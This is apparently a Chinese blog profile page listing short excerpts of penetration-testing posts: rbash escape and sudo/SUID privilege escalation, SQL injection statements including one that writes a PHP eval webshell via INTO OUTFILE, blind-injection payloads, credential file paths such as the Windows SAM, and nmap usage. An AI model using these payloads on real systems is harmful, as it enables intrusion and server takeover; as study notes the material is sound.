1 孤君

尚未进行身份认证

行百里者半九十

等级
TA的排名 2w+

Linux突破受限shell使用sudo提权

使用ssh登录restricted受限的受限的shell命令,rbash,百度搜索rbash,发现有绕过方法,进行查找,并尝试Vi编辑,输入,到了/bin/bashBASH_CMDS[a]=/bin/sh;a/bin/bash此时就变成了bash的shell然后导入环境变量,目的为了能够使用哪些环境变量中的命令sudo尝试提权尝试提权先转换到jerry用户,至于为什么...

2019-09-15 17:23:27

wpscan更新失败

wpscan--update 在线更新更新失败那就将包下载到本地更新wgethttp://blog.dsb.ink/wpscan/wp.zipunzipwp.zip将刚刚wpscan的解压文件放到apache的目录里设置wpscan的更新配置文件打开本地的服务器serviceapache2start更新...

2019-09-15 12:00:54

Linux配置不当提权-suid提权

攻击成功,并得到一个shell,但是这里却只是一个简单的shell,首先需要把它转换为一个交互式的shell在简单shell中直接按删除键是不行的,要按住ctrl键之后,再按住删除键才可以,其他键的使用也一样命令python-c'importpty;pty.spawn("/bin/bash")'现在已经进入了一个交互的shell了,但是可以看到这只是一个普通的用户,所以我们要把他提...

2019-09-14 22:28:47

常用配置文件路径

Windows系统C:\boot.ini 查看系统版本C:\windows\system32\inetsrv\MetaBase.xml IIS配置文件 C:\windows\repair\sam 存储Windows系统初次安装的密码C:\ProgramFiles\mysql\my.ini mysql配置C:\ProgramFiles\mysql\data\m...

2019-09-13 14:23:11

MYSQL写入一句话的方式

一、unionselect后写入最常见的写入方式,unionselect后跟intooutfile语句1'unionselect1,2,'<?php@eval($_POST[cmd]);?>'intooutfile"C:\\phpStudy\\PHPTutorial\\WWW\\shell.php"--+1'unionselect1,2,'&l...

2019-09-13 14:21:07

PHP代码执行函数总结(可以用于制作一句话木马)

PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行...

2019-09-07 09:19:15

SQL布尔盲注常用语句

过程1.判断是否存在注入,注入字符型还是数字型2.猜解当前数据库名 数据库长度→库名3.数据库中的表名 几个表→长度→名称4.表中的字段名 字段个数→长度→名称5.数据判断1’and‘1’=‘11’and‘1’='22.库名1’andlength(database())>3#1’andlength(database())=5#1’andmid...

2019-08-23 16:14:57

SQL注入常用语句

一、判断类型用and判断其字符类型’and‘1’='1 正常返回’and‘1’='2 页面正常,但是与上个页面相比,没有查询数据(网站没对sql输入做特殊过滤和处理) 字符型上两条必须是一起判断的’and‘1’='1 非正常返回,显示错误。可能性 1.有过滤2.闭合符不对3.不是字符型总:如果是字符型,那么’and‘1’=‘1正常,’and‘...

2019-08-23 16:12:42

渗透测试---命令执行注入

概述命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内导致原因代码过滤不严格系统漏洞调用第三方组件如:php(system(),shell_exec(),exec(),eval())、java(struts2)、thinkphp(老牌的php框架)等&、&&、|、||再windows和linux的命令执行中,都有同样的效果&...

2019-08-21 11:41:39

渗透测试---爆破含有token验证

参数选择必须选择pitchfork模式设置字典options设置开始爆破结果爆破成功

2019-08-20 17:27:12

渗透测试---提权后获取信息

LINUXuname-a 查看当前系统版本、内核等whoami 查看当前使用的用户pwd 查看当前所在路径ifconfig-a 查看网卡信息,IP、MAC等iptables-L 查看防火墙规则dpkg-l 查看已经安装的软件ps-aux 查看进程netstat-nr 查看网关netstat-ano 查看打开的端口/etc/passwd...

2019-08-20 12:04:18

渗透测试---本地提权

本地提权目前系统都是多用户操作系统,可以登录多个账户,实现权限的隔离,针对不同的应用,对应不同的账户,不同的账户在对应不同的权限;本地提权一般用于已经获取到了本地低权限的账号,希望获取更高的权限,实现对目标的进一步控制;简单地说,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限,权限控制是WINDOWS、Linux等系统安全的基石,也是一切安全软件的基石,一旦...

2019-08-16 17:29:41

nmap端口扫描常用参数

TCP-sS/sT/sA/sW/sMTCPSYN/TCPconnect()/ACK/TCP窗口扫描/TCPMaimon-sN/sF/sXTCPNull,FIN,andXmas扫描-sSTCPSYN扫描通常又叫“半开放”扫描。因为它不必打开一个完整的TCP连接,只发送一个SY...

2019-08-14 21:55:40

nmap主机探测的参数使用

-sn主机发现(不扫端口),只要有此参数,那么在主机发现时,目标IP为内网时使用ARP协议,目标IP为外网时,使用ICMP和TCP协议目标为内网目标为外网使用的是ICMP协议的echo请求包、时间戳请求包和TCP协议中SYN请求包、ACK请求包-PE/PP/PM(ICMP协议)此时使用icmp协议,-sn可加可不加使用ICMPechoicmptimestampnetmas...

2019-08-13 17:24:53

vim去除重复行

先sort排序,再去重:sort//直接排序:g/^\(.*\)$\n\1$/d//去除重复行:g/\%(^\1$\n\)\@<=\(.*\)$/d//功能同上,也是去除重复行:g/\%(^\1\>.*$\n\)\@<=\(\k\+\).*$/d//功能同上,也是去除重复行...

2019-08-12 20:19:48

kali添加软件快捷方式

查看软件是否安装whereisfirefox如果已安装就会有数据返回查看软件可执行文件的位置whichfirefox打开终端输入leafpad回车输入以下内容[DesktopEntry]Version=2333Name=firefoxName[zh_CN]=firefox-浏览器Exec=/usr/bin/firefoxTerminal=falseTyp...

2019-08-12 10:22:27

渗透测试---信息收集(域名信息)

在信息收集中目标的域名相关的信息是很重要的,比如:注册信息域名对应的真实IP域名服务器邮件服务器子域名IP反查旁站C段所要收集的信息及其工具注册信息----whois、https://www.aizhan.com/、http://www.7c.com/、https://www.yougetsignal.com/域名对应的真实IP—nslookup、dig域名服务器—fi...

2019-08-11 22:42:43

信息收集之DNS信息收集 -- fierce

目录工具描述参数解释爆破子域名自定义字典爆破子域名反查指定范围的IP段反查指定域名附近的IP段反查指定域名所在的C段IP扫描优化:自定义超时时间、多线程工具描述Fierce是一款IP、域名互查的DNS工具,可进行域传送漏洞检测、字典爆破子域名、反查IP段、反查指定域名上下一段IP,属于一款半轻量级的多线程信息收集用具。Fierce可尝试建立HTTP连接以确定子域名是否存在,...

2019-08-10 10:00:00

Linux开机流程

转载于:https://www.cnblogs.com/shishanyu/p/7966975.html开机过程指的是从打开计算机电源直到LINUX显示用户登录画面的全过程。分析LINUX开机过程也是深入了解LINUX核心工作原理的一个很好的途径。启动第一步–加载BIOS当你打开计算机电源,计算机会首先加载BIOS信息,BIOS信息是如此的重要,以至于计算机必须在最开始就找到它。这是因为BI...

2019-08-08 16:06:12

iptables中的默认规则

在iptables中默认规则是指filter表中的INPUT、OUTPUT、FORWARD三条链的规则

2019-08-07 12:17:58

查看更多

勋章 我的勋章
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 1024勋章
    1024勋章
    #1024程序员节#活动勋章,当日发布原创博客即可获得
  • 勤写标兵Lv3
    勤写标兵Lv3
    授予每个自然周发布7篇到8篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。